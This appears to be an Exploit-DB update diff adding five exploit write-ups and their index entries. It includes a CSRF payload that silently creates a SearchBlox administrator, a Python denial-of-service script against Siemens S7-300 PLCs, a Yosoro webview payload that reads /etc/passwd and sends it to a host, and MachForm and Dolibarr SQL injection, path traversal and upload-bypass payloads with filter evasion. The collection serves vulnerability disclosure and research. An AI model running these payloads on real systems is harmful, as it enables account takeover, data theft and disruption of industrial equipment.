DB: 2018-05-31

6 changes to exploits/shellcodes

Siemens SIMATIC S7-300 CPU - Remote Denial of Service

Procps-ng - Multiple Vulnerabilities
SearchBlox 8.6.6 - Cross-Site Request Forgery
Yosoro 1.0.4 - Remote Code Execution
MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass
Dolibarr 7.0.0 - SQL Injection

exploits/java/webapps/44801.txt

@@ -0,0 +1,48 @@
+# Exploit Title: CSRF Privilege Escalation (Creation of an administrator
+account) on SearchBlox 8.6.6
+# Exploit Author: Canberk BOLAT, Ahmet GÜREL
+# Software Link: https://www.searchblox.com/
+# Version: < = SearchBlox Version 8.6.6
+# Platform: Java
+# Tested on: Windows
+# CVE: CVE-2018-11538
+
+# 1. DETAILS
+
+Using Cross-Site Request Forgery (CSRF), an attacker can force a user who
+is currently authenticated with a web application to execute an unwanted
+action. The attacker can trick the user into loading a page which may send
+a request to perform the unwanted action in the background. In the case of
+Searchblox, we can use CSRF to perform actions on the admin dashboard by
+targeting an administrator.
+
+# 2. PoC:
+
+We assume that Searchblox is installed at http://localhost:8080/. Our
+target is /searchblox/servlet/UserServlet u_name, u_passwd1, u_passwd2 and
+role parameter which is the page used to create a new user. The given POC
+will create a user on the website which has full administrator privileges.
+
+HTTP Request:
+
+GET
+/searchblox/servlet/UserServlet?u_name=best1&u_passwd1=test&u_passwd2=test&role=admin&new-group=&menu1=adm&menu2=db&action=addBuisnessUser
+HTTP/1.1
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0)
+Gecko/20100101 Firefox/59.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost:8080/searchblox/admin/main.jsp?menu1=adm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+Cookie: JSESSIONID=touluja8tpjc1iiwquoyiigfi;
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+Attack Vector:
+
+<img src="
+http://target:8080/searchblox/servlet/UserServlet?u_name=best1&u_passwd1=test&u_passwd2=test&role=admin&new-group=&menu1=adm&menu2=db&action=addBuisnessUser"
+width="0" height="0">

exploits/linux/dos/44802.py

@@ -0,0 +1,21 @@
+# Exploit Title: Siemens SIMATIC S7-300 CPU - Remote Denial Of Service
+# Google Dork: inurl:/Portal/Portal.mwsl
+# Date: 2018-05-30
+# Exploit Author: t4rkd3vilz
+# Vendor Homepage: https://www.siemens.com/
+# Version: SIMATIC S7-300 CPU family: all versions.
+# Tested on: Kali Linux
+# CVE: CVE-2015-2177
+
+#!/usr/bin/python
+import socket
+
+target_address="TargetIP"
+target_port=80
+
+buffer = "GET " + "\x42" * 2220 + " HTTP/1.1\r\n\r\n"
+
+sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=sock.connect((target_address,target_port))
+sock.send(buffer)
+sock.close()

exploits/macos/webapps/44803.txt

@@ -0,0 +1,17 @@
+# Exploit title: Yosoro 1.0.4 - Remote Code Execution
+# Date: 2018-05-29
+# Exploit Author: Carlo Pelliccioni
+# Vendor homepage: https://yosoro.coolecho.net/
+# Software link: https://github.com/IceEnd/Yosoro/releases/download/v1.0.4/Yosoro-darwin-x64-1.0.4.zip
+# Version: 1.0.4
+# Tested on: MacOS 10.13.4
+# CVE: CVE-2018-11522
+#  _  _            _    _    _             ___                      _  _         
+# | || | __ _  __ | |__| |_ (_)__ __ ___  / __| ___  __  _  _  _ _ (_)| |_  _  _ 
+# | __ |/ _` |/ _|| / /|  _|| |\ V // -_) \__ \/ -_)/ _|| || || '_|| ||  _|| || |
+# |_||_|\__,_|\__||_\_\ \__||_| \_/ \___| |___/\___|\__| \_,_||_|  |_| \__| \_, |
+
+# Remote Code Execution (CVE-2018-11522)
+# Payload: 
+
+<webview src="data:text/html,<script>var read = require('fs').readFileSync('/etc/passwd', 'utf-8'); document.location='http://127.0.0.1:8089/'+btoa(read); </script>" nodeintegration></webview>

exploits/php/webapps/44804.txt

@@ -0,0 +1,105 @@
+Vendor: Appnitro
+Product webpage: https://www.machform.com/
+Full-Disclose: https://metalamin.github.io/MachForm-not-0-day-EN/
+Fix: https://www.machform.com/blog-machform-423-security-release/
+
+Author: Amine Taouirsa
+Twitter: @metalamin
+
+Google dork examples:
+----------------------
+"machform" inurl:"view.php"
+"machform" inurl:"embed.php"
+
+Summary:
+---------
+The form creation platform MachForm from Appnitro is subject to SQL
+injections that lead to path traversal and arbitrary file upload.
+
+The application is widely deployed and with some google dorks it’s possible
+to find various webpages storing sensitive data as credit card numbers with
+corresponding security codes. Also, the arbitrary file upload can let an
+attacker get control of the server by uploading a WebShell.
+
+[1] SQL injection (CVE-2018-6410):
+-------------------------
+
+[1.1] Description:
+The software is subject to SQL injections in the ‘download.php’ file.
+
+[1.2] Parameters and statement:
+This SQLi can be found on the parameter ‘q’ which a base64 encoded value
+for the following parameters:
+
+  $form_id = $params['form_id'];
+  $id      = $params['id'];
+  $field_name = $params['el'];
+  $file_hash  = $params['hash'];
+
+
+So the injectable parameters are ‘el’ and ‘form_id’ obtaining error-based,
+stacked queries and time-based blind SQL injections. This is due to the
+following vulnerable statement:
+
+  $query = "select {$field_name} from `".MF_TABLE_PREFIX."form_{$form_id}`
+where id=?";
+
+
+[1.3] POC
+Proof of concept to get the first user mail:
+  http:// [URL] / [Machform_folder] /download.php?q=
+ZWw9IChTRUxFQ1QgMSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHgy
+MDIwLChTRUxFQ1QgTUlEKCh1c2VyX2VtYWlsKSwxLDUwKSBGUk9NIGFwX3Vz
+ZXJzIE9SREVSIEJZIHVzZXJfaWQgTElNSVQgMCwxKSwweDIwMjAsRkxPT1Io
+UkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLkNIQVJBQ1RF
+Ul9TRVRTIEdST1VQIEJZIHgpYSkgOyZpZD0xJmhhc2g9MSZmb3JtX2lkPTE=
+
+Which is the base64 encoding for:
+  el= (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x2020,(SELECT
+MID((user_email),1,50) FROM ap_users ORDER BY user_id LIMIT
+0,1),0x2020,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP
+BY x)a) ;&id=1&hash=1&form_id=1
+
+
+[2] Path traversal (CVE-2018-6409):
+-----------------------------------
+
+[2.1] Descrition
+download.php’ is used to serve stored files from the forms answers.
+Modifying the name of the file to serve on the corresponding ap_form table
+leads to a path traversal vulnerability.
+
+[2.2] POC
+First we need to change the name for the element on the form:
+update ap_form_58009 set element_4="../../../../../../.
+./../../../../../../../../../etc/passwd" where id=1;
+
+Now in order to be able to download it, we need to access:
+  http:// [URL] / [Machform_folder] /download.php?q=
+ZWw9NCZpZD0xJmhhc2g9NDAyYmEwMjMwZDZmNDRhMmRlNTkwYWMxMTEwN2E0
+NTgmZm9ybV9pZD01ODAwOQo=
+
+Which is the base64 encoding for;
+  el=4&id=1&hash=402ba0230d6f44a2de590ac11107a458&form_id=58009
+
+Note that hash is the MD5 of the corresponding filename:
+  md5("../../../../../../../../../../../../../../../../etc/passwd") =
+402ba0230d6f44a2de590ac11107a458
+
+[3] Bypass file upload filter (CVE-2018-6411):
+----------------------------------------------
+
+When the form is set to filter a blacklist, it automatically add dangerous
+extensions to the filters.
+If the filter is set to a whitelist, the dangerous extensions can be
+bypassed.
+
+This can be done directly on the database via SQLi
+update ap_form_elements set element_file_type_list="php",
+element_file_block_or_allow="a" where form_id=58009 and element_id=4;
+
+Once uploaded the file can be found and executed in the following URL:
+http:// [URL] / [Machform_folder] /data/form_58009/files/ [filename]
+
+The filename can be found in the database
+SELECT element_4 FROM ap_form_58009 WHERE id=1;

exploits/php/webapps/44805.txt

@@ -0,0 +1,204 @@
+# [CVE-2018-10094] Dolibarr SQL Injection vulnerability
+
+
+## Description
+
+Dolibarr is an "Open Source ERP & CRM for Business" used by many
+companies worldwide.
+
+It is available through [GitHub](https://github.com/Dolibarr/dolibarr)
+or as distribution packages (e.g .deb package).
+
+**Threat**
+
+The application does not handle user input properly and allows execution
+of arbitrary SQL commands on the database.
+
+**Expectation**
+
+Prepared queries should be used in order to avoid SQL injection in user
+input.
+
+
+## Vulnerability type
+
+**CVE ID**: CVE-2018-10094
+
+**Access Vector**: remote
+
+**Security Risk**: high
+
+**Vulnerability**: CWE-89
+
+**CVSS Base Score**: 7.5
+
+**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+
+
+## Details
+
+The database connector escapes quotes with the `real_escape_string()`
+wrapper. However it is still possible to perform injection on integer
+parameters without quotes.
+
+```php
+mysqli.class.php
+
+    /**
+     *  Escape a string to insert data
+     *
+     *  @param  string  $stringtoencode     String to escape
+     *  @return string                      String escaped
+     */
+    function escape($stringtoencode)
+    {
+        return $this->db->real_escape_string($stringtoencode);
+    }
+```
+
+Additional checks are defined later, which forbit some SQL keywords (e.g
+`union`, `create`, `insert`). However, by url encoding the payload,
+these checks are bypassed.
+
+```php
+main.inc.php
+
+/**
+ * Security: SQL Injection and XSS Injection (scripts) protection
+(Filters on GET, POST, PHP_SELF).
+ *
+ * @param       string      $val        Value
+ * @param       string      $type       1=GET, 0=POST, 2=PHP_SELF
+ * @return      int                     >0 if there is an injection
+ */
+function test_sql_and_script_inject($val, $type)
+{
+    $inj = 0;
+    // For SQL Injection (only GET are used to be included into bad
+escaped SQL requests)
+    if ($type == 1)
+    {
+        $inj += preg_match('/updatexml\(/i',     $val);
+        $inj += preg_match('/delete\s+from/i',   $val);
+        $inj += preg_match('/create\s+table/i',  $val);
+        $inj += preg_match('/insert\s+into/i',   $val);
+        $inj += preg_match('/select\s+from/i',   $val);
+        $inj += preg_match('/into\s+(outfile|dumpfile)/i',  $val);
+    }
+    if ($type != 2) // Not common, we can check on POST
+    {
+        $inj += preg_match('/update.+set.+=/i',  $val);
+        $inj += preg_match('/union.+select/i',   $val);
+        $inj += preg_match('/(\.\.%2f)+/i',      $val);
+    }
+    // For XSS Injection done by adding javascript with script
+    // This is all cases a browser consider text is javascript:
+    // When it found '<script', 'javascript:', '<style', 'onload\s=' on
+body tag, '="&' on a tag size with old browsers
+    // All examples on page: http://ha.ckers.org/xss.html#XSScalc
+    // More on
+https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
+    $inj += preg_match('/<script/i', $val);
+    $inj += preg_match('/<iframe/i', $val);
+    $inj += preg_match('/Set\.constructor/i', $val);    // ECMA script 6
+    if (! defined('NOSTYLECHECK')) $inj += preg_match('/<style/i', $val);
+    $inj += preg_match('/base[\s]+href/si', $val);
+    $inj += preg_match('/<.*onmouse/si', $val);       // onmousexxx can
+be set on img or any html tag like <img title='...' onmouseover=alert(1)>
+    $inj += preg_match('/onerror\s*=/i', $val);       // onerror can be
+set on img or any html tag like <img title='...' onerror = alert(1)>
+    $inj += preg_match('/onfocus\s*=/i', $val);       // onfocus can be
+set on input text html tag like <input type='text' value='...' onfocus =
+alert(1)>
+    $inj += preg_match('/onload\s*=/i', $val);        // onload can be
+set on svg tag <svg/onload=alert(1)> or other tag like body <body
+onload=alert(1)>
+    $inj += preg_match('/onclick\s*=/i', $val);       // onclick can be
+set on img text html tag like <img onclick = alert(1)>
+    $inj += preg_match('/onscroll\s*=/i', $val);      // onscroll can be
+on textarea
+    //$inj += preg_match('/on[A-Z][a-z]+\*=/', $val);   // To lock event
+handlers onAbort(), ...
+    $inj += preg_match('/&#58;|&#0000058|&#x3A/i', $val);       //
+refused string ':' encoded (no reason to have it encoded) to lock
+'javascript:...'
+    //if ($type == 1)
+    //{
+        $inj += preg_match('/javascript:/i', $val);
+        $inj += preg_match('/vbscript:/i', $val);
+    //}
+    // For XSS Injection done by adding javascript closing html tags
+like with onmousemove, etc... (closing a src or href tag with not
+cleaned param)
+    if ($type == 1) $inj += preg_match('/"/i', $val);       // We
+refused " in GET parameters value
+    if ($type == 2) $inj += preg_match('/[;"]/', $val);     // PHP_SELF
+is a file system path. It can contains spaces.
+    return $inj;
+}
+```
+
+## Proof of Concept : retrieving the database name.
+
+Payload:
+
+```
+1) union select
+0,1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
+
+Url-encoded payload:
+%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%32%2c%76%65%72%73%69%6f%6e%28%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%23
+```
+
+```http
+GET
+/dolibarr/adherents/list.php?leftmenu=members&statut=%31%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%30%2c%31%2c%32%2c%76%65%72%73%69%6f%6e%28%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%23
+HTTP/1.1
+Host: dolibarr.lab:2080
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
+Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie:
+DOLSESSID_cac4a1e49e4040e845340fe919bd202b=qh3ot46kvm95ph0ddd3ujd7je5
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+...
+
+</a>
+             </td>
+             <td>10.1.26-MariaDB-0+deb9u1</td>
+             <td>2</td>
+             <td></td>
+             <td>1</td>
+             <td>21</td>
+             <td class="nowrap">
+```
+
+
+## Affected versions
+
+* Version 7.0.0 (last stable version as of March 2018) - previous
+versions are probably also vulnerable but not tested
+
+## Solution
+
+Update to 7.0.2
+([changelog](https://raw.githubusercontent.com/Dolibarr/dolibarr/develop/ChangeLog))
+
+## Timeline (dd/mm/yyyy)
+
+* 18/03/2018 : Initial discovery
+* 17/04/2018 : Contact with the editor
+* 17/04/2018 : Editor acknowledges the vulnerability
+* 18/04/2018 : Editor announces fixes in version 7.0.2
+* 21/05/2018 : Vulnerability disclosure
+
+## Credits
+
+* Issam RABHI (i dot rabhi at sysdream dot com)
+* Kevin LOCATI (k dot locati at sysdream dot com)
+
+-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream

files_exploits.csv

@@ -5983,6 +5983,7 @@ id,file,description,date,author,type,platform,port
 44758,exploits/windows/dos/44758.html,"Microsoft Edge Chakra - Cross Context Use-After-Free",2018-05-25,"Google Security Research",dos,windows,
 44759,exploits/multiple/dos/44759.html,"Skia and Firefox - Integer Overflow in SkTDArray Leading to Out-of-Bounds Write",2018-05-25,"Google Security Research",dos,multiple,
 44768,exploits/php/dos/44768.txt,"Symfony 2.7.0 < 4.0.10 - Denial of Service",2018-05-26,"Federico Stange",dos,php,
+44802,exploits/linux/dos/44802.py,"Siemens SIMATIC S7-300 CPU - Remote Denial of Service",2018-05-30,t4rkd3vilz,dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9748,6 +9749,7 @@ id,file,description,date,author,type,platform,port
 44787,exploits/windows_x86/local/44787.py,"ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)",2018-05-28,"Gokul Babu",local,windows_x86,
 44797,exploits/linux/local/44797.txt,"GNU Barcode 0.99 - Buffer Overflow",2018-05-29,LiquidWorm,local,linux,
 44798,exploits/linux/local/44798.txt,"GNU Barcode 0.99 - Memory Leak",2018-05-29,LiquidWorm,local,linux,
+44806,exploits/linux/local/44806.txt,"Procps-ng - Multiple Vulnerabilities",2018-05-30,"Qualys Corporation",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39470,3 +39472,7 @@ id,file,description,date,author,type,platform,port
 44796,exploits/java/webapps/44796.txt,"Pivotal Spring Java Framework < 5.0 - Remote Code Execution",2018-05-29,JameelNabbo,webapps,java,
 44799,exploits/php/webapps/44799.txt,"Facebook Clone Script 1.0.5 - 'search' SQL Injection",2018-05-29,L0RD,webapps,php,
 44800,exploits/php/webapps/44800.txt,"Facebook Clone Script 1.0.5 - Cross-Site Request Forgery",2018-05-29,L0RD,webapps,php,
+44801,exploits/java/webapps/44801.txt,"SearchBlox 8.6.6 - Cross-Site Request Forgery",2018-05-30,"Ahmet Gurel",webapps,java,
+44803,exploits/macos/webapps/44803.txt,"Yosoro 1.0.4 - Remote Code Execution",2018-05-30,"Carlo Pelliccioni",webapps,macos,
+44804,exploits/php/webapps/44804.txt,"MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass",2018-05-30,"Amine Taouirsa",webapps,php,80
+44805,exploits/php/webapps/44805.txt,"Dolibarr 7.0.0 - SQL Injection",2018-05-30,Sysdream,webapps,php,80